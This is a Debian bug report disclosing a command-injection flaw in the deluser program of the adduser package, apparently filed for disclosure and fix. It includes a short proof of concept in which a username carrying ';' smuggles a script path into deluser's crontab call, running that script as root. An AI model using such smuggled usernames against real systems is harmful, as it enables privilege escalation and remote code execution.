Package: adduser Version: 3.118 Severity: important Dear Maintainer,
A command injection vulnerability has been found in the deluser program in the adduser package. When deleteing a user via deluser with dangerous characters in its name (such as / and ;), the commands injected are interpreted by the shell when deluser invokes crontab. This issue could be exploited most likely in systems that automatically allow adding/removing users ( such as in an enterprise usecase, where employees are deleted upon them quitting the org.) If there are automated scripts/solutions in use where usernames can be arbitarily changed, this can lead to remote code execution. deluser should check & escape dangerous characters when invoking crontab (or simple add -- onto the end of the crontab command line might work? proof of concept (on a Live booted debian): $ sudo useradd $(echo -e "bob;/home/user/test") #confirm bob's existance $ grep bob /etc/passwd $ cat /home/user/test #!/bin/bash touch /hacked $ chmod +x /home/user/test $ deluser Enter a user name to remove: bob;/home/user/test snipped output... .. /usr/sbin/deluser: `/bin/crontab -r bob;/home/user/test' returned error code 1. Exiting. $ ls -l /hacked -rw-r--r-- 1 root root 0 Sep 17 12:41 /hacked -- System Information: Debian Release: 10.1 Architecture: amd64 (x86_64) Kernel: Linux 4.19.0-6-amd64 (SMP w/1 CPU core) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), LANGUAGE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /usr/bin/dash Init: systemd (via /run/systemd/system) Versions of packages adduser depends on: ii debconf [debconf-2.0] 1.5.71 ii passwd 1:4.5-1.1 adduser recommends no packages. Versions of packages adduser suggests: ii liblocale-gettext-perl 1.07-3+b4 ii perl 5.28.1-6 -- debconf information: adduser/homedir-permission: true adduser/title:
